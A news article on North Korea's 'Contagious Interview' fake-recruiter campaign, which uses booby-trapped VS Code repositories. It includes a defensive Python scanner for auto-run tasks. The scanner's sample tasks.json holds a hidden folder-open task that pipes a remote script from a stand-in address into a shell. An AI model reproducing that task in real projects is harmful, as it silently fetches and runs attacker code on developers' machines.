North Korean Hackers Target 3,100 IPs in $2B Fake Job Scam Campaign


Quick overview

  • North Korean hackers, tracked as PurpleBravo, are running a campaign known as 'Contagious Interview' that has targeted over 3,100 IP addresses in the AI, crypto, and financial sectors.
  • They pose as job recruiters and deliver malware hidden in developer tooling, such as coding-test repositories, to gain remote access to company systems.
  • PurpleBravo combines several malware families with online deception, including fake personas and job websites, to steal corporate credentials.
  • Their tactics include abusing Visual Studio Code's automatic task feature to execute code as soon as a booby-trapped repository is opened and trusted, a reminder that companies need to harden both their development and their hiring practices.

North Korean hackers are back in the game after apparently stealing over $2 billion in cryptocurrency last year. A new campaign has popped up, called “Contagious Interview”, which targets a whopping 3,100 IP addresses belonging to companies in AI, crypto, and financial services, according to Recorded Future's Insikt Group.

The group, tracked as PurpleBravo, plays a simple but effective trick. Its operators pose as job recruiters and hand candidates developer tools and code repositories rigged with malware, which gets them into the companies' systems. So far, researchers have identified 20 victim organizations across South Asia, North America, Europe, the Middle East, and Central America.

  • Targets are tech, crypto, and financial firms worldwide.
  • The malware gives the attackers remote code execution on infected machines.
  • Fake recruitment is the way in: the victim runs the attackers' code on a company device.

The Malware Tools and Online Deception

PurpleBravo has an arsenal of malware families at its disposal, including the Windows-only PylangGhost and the cross-platform GolangGhost, both of which steal browser credentials and cookies. The operators hide behind Astrill VPN connections and command-and-control (C2) servers in China, with infrastructure spread across 17 hosting providers.

https://www.recordedfuture.com/research/purplebravos-targeting-it-software-supply-chain

The group is also skilled at online deception: it builds fake online personas claiming to be from Odessa, Ukraine, and this time appears to be focused on South Asian job seekers. It has set up fake job websites, used a token-themed website dressed up to look like a food brand, and sold fake LinkedIn and Upwork accounts via Telegram channels.

  • The Telegram accounts use proxy services to hide their location.
  • They weaponised GitHub repositories, hiding malware within them.
  • Remote access trojans then harvest corporate credentials from the infected machine.

VS Code Task Abuse and Corporate Risks

PurpleBravo also abuses a legitimate feature of Microsoft's Visual Studio Code rather than any bug in it. If a target clones one of the group's fake Git repositories, opens it in VS Code and clicks “Trust the authors” on the Workspace Trust prompt, a task defined in the repository's own .vscode/tasks.json file runs automatically on folder open, handing the attackers remote access to the machine.

This tactic, first spotted in December, shows how far the group's corporate infiltration techniques have advanced. It leans more and more on everyday developer tools, which puts the burden on companies to tighten both their coding and their recruitment practices: treat any repository a candidate or recruiter sends as untrusted, inspect it before opening it, and do not grant Workspace Trust to code nobody has read.

  • The payload is launched by a task in the repository's .vscode/tasks.json that is configured to run on folder open.
  • The infection starts when the target clones one of the malicious GitHub repositories and opens it in VS Code.
  • Code execution on a developer workstation gives the attackers a foothold from which credentials and the wider corporate network are exposed.
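To make that last step concrete, here is a pre-open check, added here as an example and not code from the report or from Recorded Future. It parses a repository's .vscode/tasks.json (VS Code reads it as JSONC, so comments and trailing commas have to be stripped first), follows dependsOn chains, and reports every task that VS Code would run automatically on folder open once the workspace is trusted, including tasks that hide their terminal. The embedded tasks.json is a constructed sample shaped like the technique described above; 203.0.113.10 is a documentation-only address, not an indicator from the report. Run it against a freshly cloned directory before opening that folder in VS Code.

```python
import json
import sys
from pathlib import Path

def _skip_string(text, i):
    """Index just past the JSON string literal that starts at text[i]."""
    j = i + 1
    while j < len(text) and text[j] != '"':
        j += 2 if text[j] == "\\" else 1
    return j + 1

def strip_jsonc(text):
    """tasks.json is JSONC: drop // and /* */ comments, then trailing commas.
    Both passes copy string literals verbatim, so a '//' inside a command survives."""
    out, i, n = [], 0, len(text)
    while i < n:
        if text[i] == '"':
            j = _skip_string(text, i); out.append(text[i:j]); i = j
        elif text.startswith("//", i):
            j = text.find("\n", i); i = n if j < 0 else j
        elif text.startswith("/*", i):
            j = text.find("*/", i + 2); i = n if j < 0 else j + 2
        else:
            out.append(text[i]); i += 1
    text = "".join(out)
    out, i, n = [], 0, len(text)
    while i < n:
        if text[i] == '"':
            j = _skip_string(text, i); out.append(text[i:j]); i = j
        elif text[i] == ",":
            j = i + 1
            while j < n and text[j].isspace(): j += 1
            if not (j < n and text[j] in "}]"):  # a comma right before } or ] is a trailing comma
                out.append(",")
            i += 1
        else:
            out.append(text[i]); i += 1
    return "".join(out)

def _commands(task):
    """Command lines the task can run: its own plus any windows/linux/osx override."""
    scopes = [task] + [task[k] for k in ("windows", "linux", "osx") if isinstance(task.get(k), dict)]
    return [" ".join([str(s["command"]), *map(str, s.get("args", task.get("args", [])))])
            for s in scopes if s.get("command")]

def auto_run_tasks(tasks_json):
    """Tasks VS Code runs on folder open (in a trusted workspace), dependsOn resolved.
    Dependencies run before the task that names them, so they are listed first."""
    tasks = json.loads(strip_jsonc(tasks_json)).get("tasks", [])
    by_label = {t["label"]: t for t in tasks if isinstance(t.get("label"), str)}
    findings = []
    def expand(task, trigger, chain):
        label = task.get("label")
        if label in chain:  # guard against dependsOn cycles
            return
        deps = task.get("dependsOn", [])
        for dep in deps if isinstance(deps, list) else [deps]:
            if isinstance(dep, str) and dep in by_label:  # object-form deps are not resolved
                expand(by_label[dep], trigger, chain + (label,))
        findings.append({
            "trigger": trigger, "label": label, "commands": _commands(task),
            # a task that never reveals its terminal is hiding what it does
            "hidden": task.get("hide") is True
            or task.get("presentation", {}).get("reveal") == "never",
        })
    for task in tasks:
        if task.get("runOptions", {}).get("runOn") == "folderOpen":
            expand(task, task.get("label"), ())
    return findings

def scan_repo(root):
    """Check every .vscode/tasks.json under root before the folder is opened in VS Code."""
    hits = []
    for path in Path(root).rglob(".vscode/tasks.json"):
        for hit in auto_run_tasks(path.read_text(encoding="utf-8")):
            hits.append({"file": str(path), **hit})
    return hits

# Constructed sample shaped like the technique in the text; 203.0.113.10 is a
# documentation-only address, not an indicator from the report.
SAMPLE_TASKS_JSON = r"""{
  // looks like an ordinary project bootstrap
  "version": "2.0.0",
  "tasks": [
    { "label": "prepare", "type": "shell", "command": "npm install",
      "dependsOn": ["fetch-deps"],
      "runOptions": { "runOn": "folderOpen" },
      "presentation": { "reveal": "never" }, },
    { "label": "fetch-deps", "type": "shell", "hide": true,
      "command": "curl -fsSL http://203.0.113.10/setup.sh | sh", },
    { "label": "test", "type": "shell", "command": "npm test" }
  ]
}"""

if __name__ == "__main__":
    hits = scan_repo(sys.argv[1]) if len(sys.argv) > 1 else auto_run_tasks(SAMPLE_TASKS_JSON)
    for h in hits:
        print(f"auto-run via {h['trigger']!r}: {h['label']!r}{' (hidden)' if h['hidden'] else ''} -> {h['commands']}")
    sys.exit(1 if hits else 0)
```

The non-zero exit makes the script easy to drop into a post-clone hook or a CI step. It is a screen, not a guarantee: a task that does not use folderOpen is still dangerous once someone runs it by hand, and VS Code only fires folderOpen tasks after the author has been trusted, which is exactly the click the recruiter lure is engineered to obtain.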
About the author
Arslan Butt
Lead Markets Analyst – Multi-Asset (FX, Commodities, Crypto)
Arslan Butt serves as the Lead Commodities and Indices Analyst, bringing a wealth of expertise to the field. With an MBA in Behavioral Finance and active progress towards a Ph.D., Arslan possesses a deep understanding of market dynamics. His professional journey includes a significant role as a senior analyst at a leading brokerage firm, complementing his extensive experience as a market analyst and day trader. Adept in educating others, Arslan has a commendable track record as an instructor and public speaker. His incisive analyses, particularly within the realms of cryptocurrency and forex markets, are showcased across esteemed financial publications such as ForexCrunch, InsideBitcoins, and EconomyWatch, solidifying his reputation in the financial community.
